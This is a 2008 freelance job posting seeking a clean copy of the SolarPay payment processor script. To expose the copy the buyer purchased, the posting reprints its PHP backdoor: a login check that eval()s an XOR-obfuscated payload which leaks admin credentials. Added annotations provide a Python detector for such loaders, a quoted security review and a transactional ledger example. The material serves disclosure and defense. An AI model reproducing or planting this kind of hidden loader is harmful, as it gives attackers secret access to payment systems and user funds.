Project Detail

Solar Payment processor script needed  

Solar Payment processor script needed is project number 337477 posted at Freelancer.com.

 

 

Status: Cancelled

Selected Providers: -

Budget: $30-250

Created: 11/01/2008 at 21:26 EDT

Bid Count: 1

Average Bid: N/A

12/31/2008 at 21:26 EST

Project Creator: eteqdotcom
Employer Rating: 10/10 (19 reviews)

 

Description

Who can provide me this SOLAR payment processor script? Not encrypted, no backdoors, no security leaks. I want it OPEN SOURCE first THEN....it can be encrypted..... I bought it encrypted from this dickhead who claimed he wrote it and now he can't set it up cause he doesn't know what a cron job is...

http://www.e-topbiz.com/oprema/pages/pproc2.php


Here are others that claim they wrote it too..

http://plxwebdev.com/demos/plxsolarpay/
http://paymentprocessorscript.net/demo/shop.htm
http://www.hotscripts.com/Detailed/36379.html

So basically, I want that script (or a better one) installed on my Linux/MySQL server (I have no cron on my server...so that's a workaround 4ya...)
Please show proof that you have the REAL script and I'll select you immediately. Be smart = get selected.
Regards,
eteqdotcom


Additional information submitted:

11/01/2008 at 22:22 EDT:
after some more research ....(well u get the picture..none of that below...none..)

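// Login check as posted: compares the submitted credentials with the admin row.
function authCheck(){
  global $superpass;
  list($adm_login) = mysql_fetch_row(mysql_query("SELECT username FROM epay_users WHERE id=3"));
  if ($_POST['username'] == $adm_login && $_POST['password'] == $superpass){
    return 1;
  }else{
    // Every failed login falls through to an encoded payload that is decoded and eval()'d.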
$aaaa111111111111111111 = "cd3db41c99299378cd1b632ed1872@@7c63189d59f3ca3e775b2b7742fba@@97a2c191b9dba3a13bfe569215140d6a|3e6a60255233465a53632d270664371f69463403151d261f126e6a4d601163083533286002163a44142b3c57603b5c794e7b532256176473133412152c35170725560021661167444b51655e532256176d75394e6f0e156f561c284343797313650b12002e11113b580e2523522d09151e28061e2659132d2d47321402516e097d403e6a212d5b28464312231f282558042d201d655a050179504c433e6a4d2b502f0947573407072c4513253d4069445b11354c55723d6a4d3339";
    eval( azxscd($aaaa111111111111111111) );
  }
}


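// Decoder for the payload above. Input layout: "<crypt input>@@<crypt salt>@@<md5>|<encoded body>".
function azxscd($eex8arss){
  $uuguug = explode("@@",$eex8arss);
  $llakkadfasda = $uuguug[0];
  $adfasdf = $uuguug[1];
  $eex8arss = $uuguug[2];
  $aadd90921 = $eex8arss;
  // The crypt() output serves as the XOR key.
  $fastdafs = crypt($llakkadfasda,$adfasdf);
  list($qq3544, $iiediieoo0) = explode("|", $aadd90921);
  // hbdddaaededbv() is not shown in this post; it appears to turn the hex text back into bytes.
  $iiediieoo0 = chop(hbdddaaededbv($iiediieoo0));
  $fastdafsst = $fastdafs;
  // Repeat the key until it is at least as long as the encoded body.
  while(strlen($fastdafs) < strlen($iiediieoo0)) {
    $fastdafs .= $fastdafsst;
  }
  $iiediieoo0 = $fastdafs ^ $iiediieoo0;
  // The decoded text is returned only if its MD5 matches the embedded checksum.
  $new_qq3544 = md5($iiediieoo0);
  if ($qq3544 == $new_qq3544) {
    $eex8arss = $iiediieoo0;
  }else{
    $eex8arss = "";
  }
  return $eex8arss;
}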


For those too lazy (or wary) to run this themselves, this means if someone tries to log in with the username and/or password set to musicfromamajormotionpicture, possibly with white space, it will echo the admin username and password.
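A static check for the pattern in the snippet above, added here as an example and not taken from the original post or from the script: it flags eval() applied to a function's return value, very long hex string literals, and string XOR assignments in PHP source. The function names, the length threshold and both sample inputs are constructed for illustration.

```python
import re

# eval( some_function( ... ) ) -- code produced at run time by a decoder.
EVAL_CALL = re.compile(r'\beval\s*\(\s*([A-Za-z_]\w*)\s*\(')
# Quoted literal of hex digits plus the "@@" and "|" separators the decoder
# splits on; 160+ chars is longer than a SHA-512 hex digest (assumed cutoff).
HEX_BLOB = re.compile(r'["\']([0-9a-fA-F@|]{160,})["\']')
# $a = $b ^ $c; -- XOR of two variables, as used to unmask the payload.
XOR_ASSIGN = re.compile(r'\$\w+\s*=\s*\$\w+\s*\^\s*\$\w+')

def scan_php(source):
    """Return (line number, finding kind, detail) tuples for one PHP file."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        m = EVAL_CALL.search(line)
        if m:
            findings.append((lineno, "eval-of-call", m.group(1)))
        m = HEX_BLOB.search(line)
        if m:
            findings.append((lineno, "hex-blob", "%d chars" % len(m.group(1))))
        if XOR_ASSIGN.search(line):
            findings.append((lineno, "string-xor", line.strip()))
    return findings

def verdict(findings):
    """eval() of a call plus a blob or XOR decode is the loader shape shown above."""
    kinds = {kind for _, kind, _ in findings}
    if "eval-of-call" in kinds and kinds & {"hex-blob", "string-xor"}:
        return "likely obfuscated loader"
    return "review manually" if kinds else "clean"

# Constructed sample with the same shape as the posted code (not the real payload).
SAMPLE = ('<?php\nfunction check_login() {\n  $blob = "'
          + "0f" * 40 + "@@" + "a1" * 40 + "|" + "3e" * 60
          + '";\n  eval( unpack_blob($blob) );\n}\n'
          'function unpack_blob($s) {\n  $k = "key";\n  $out = $k ^ $s;\n'
          '  return $out;\n}\n')
# Constructed benign file: an ordinary MD5 literal stays below the threshold.
BENIGN = '<?php\n$sum = "d41d8cd98f00b204e9800998ecf8427e";\necho md5($f) == $sum;\n'

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE), ("benign", BENIGN)):
        print(name, verdict(scan_php(src)), scan_php(src))
```
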



eteqdotcom

(19 reviews)
Project Owner
Posted: Today 22:01 EDT
after some more research....
The creator of the script has made a separate area hidden in the MySQL file that when you log in to the check-in area it will scan 2 parts of the database. If you do a scan through the SQL file before install for the name CHRIS, you will see his password that will help on making him have his own access. The script will send a signal to him to show him where all the scripts are installed, which I have not found that code to remove yet.



eteqdotcom

(19 reviews)
Project Owner
Posted: Today 21:50 EDT
Ok, basically after a "little" research I found this posting on a website..... SolarPay (aka EPay, E-Pay, DeskPay, TeamPHP Pay, etc) on a software rating site.

I've been tasked with adapting this software for barter use in a closed club. It isn't fun. This software violates pretty much every tenet of GAAP, database design, software engineering, and information security. Here is my review:



In short: Do not use SolarPay (aka EPay, E-Pay, etc). Your time is much better spent developing in house. If you do not understand both GAAP and Relational Databases, hire people who do. You will still save money.

Also note: SolarPay is GPL'd. There is no reason to pay for it if you wish to use it. The SolarWare company is now defunct and none of the (former affiliate program) vendors of SolarPay deliver support.

In Detail:



Overall Issues:

SolarPay (the version we are trying to adapt to be fit for its stated purpose) is a 7MB file, of which only 500KB is NOT dedicated to the affiliate program to sell SolarPay.

SolarPay lacks polish and sophistication.

The SolarPay HTML is badly structured and very hard to understand.

The PHP scripts are severely spaghetti code.



Architecture Issues:

SolarPay is hard-coded to use MySQL and requires the HTTPD to connect to the database as the user that owns the database (an SQL injection attack could result in the dropping of all tables, or worse).

SolarPay is hard-coded to use non-transactional table types. A user who closes the browser window mid-request could leave half-completed transactions (money withdrawn, but not sent to the transferee, or worse).

SolarPay is not based on a journaled accounting system.

SolarPay requires substantial amounts of PHP scripts to be writeable by the HTTPD process.

There is no separation between business logic, authentication and authorization, and presentation.


Implementation Issues:

Passwords are not encrypted.

Database access passwords, etc are stored under the server's documentroot.

Session handling code appears to re-invent the wheel.

Session handling code requires database writes and reads on every page view.

There are session hijacking vulnerabilities.

Database access code is spread throughout the scripts, not all in one place.

Many notification emails do not have adequate information for a merchant to complete a transaction.

Merchants who use a pay now button with a notification URL are sent the solarpay username and password of their customers.
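The half-completed transfer and the missing journal described under Architecture Issues, as an added example that is not SolarPay code and not part of the quoted review: each transfer is written as two journal rows inside one database transaction, so a request that dies between the debit and the credit leaves nothing behind. SQLite stands in for a transactional MySQL table type, and the schema, account ids and the fail_midway switch are assumptions made for the demonstration.

```python
import sqlite3

BANK, ALICE, BOB = 1, 2, 3  # constructed account ids

def open_ledger():
    # isolation_level=None: no implicit transactions, BEGIN/COMMIT are explicit.
    db = sqlite3.connect(":memory:", isolation_level=None)
    db.executescript("""
        CREATE TABLE accounts(id INTEGER PRIMARY KEY, name TEXT UNIQUE);
        CREATE TABLE journal(
            id INTEGER PRIMARY KEY,
            txn TEXT NOT NULL,
            account INTEGER NOT NULL REFERENCES accounts(id),
            amount_cents INTEGER NOT NULL  -- debit negative, credit positive
        );
        INSERT INTO accounts(name) VALUES ('bank'), ('alice'), ('bob');
        INSERT INTO journal(txn, account, amount_cents)
            VALUES ('opening', 1, -10000), ('opening', 2, 10000);
    """)
    return db

def balance(db, account):
    # Balances are derived from the journal, never stored and overwritten.
    row = db.execute("SELECT COALESCE(SUM(amount_cents), 0) FROM journal "
                     "WHERE account = ?", (account,)).fetchone()
    return row[0]

def journal_total(db):
    # Invariant of a double-entry journal: all rows sum to zero.
    return db.execute("SELECT COALESCE(SUM(amount_cents), 0) FROM journal").fetchone()[0]

def transfer(db, txn, src, dst, cents, fail_midway=False):
    """Move cents from src to dst atomically; return True on commit."""
    db.execute("BEGIN IMMEDIATE")  # take the write lock before reading the balance
    try:
        if cents <= 0 or balance(db, src) < cents:
            raise ValueError("invalid amount or insufficient funds")
        db.execute("INSERT INTO journal(txn, account, amount_cents) VALUES (?, ?, ?)",
                   (txn, src, -cents))
        if fail_midway:  # simulates the client going away mid-request
            raise ConnectionError("request aborted")
        db.execute("INSERT INTO journal(txn, account, amount_cents) VALUES (?, ?, ?)",
                   (txn, dst, cents))
        db.execute("COMMIT")
        return True
    except Exception:
        db.execute("ROLLBACK")  # the debit row disappears with the failed request
        return False
```
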


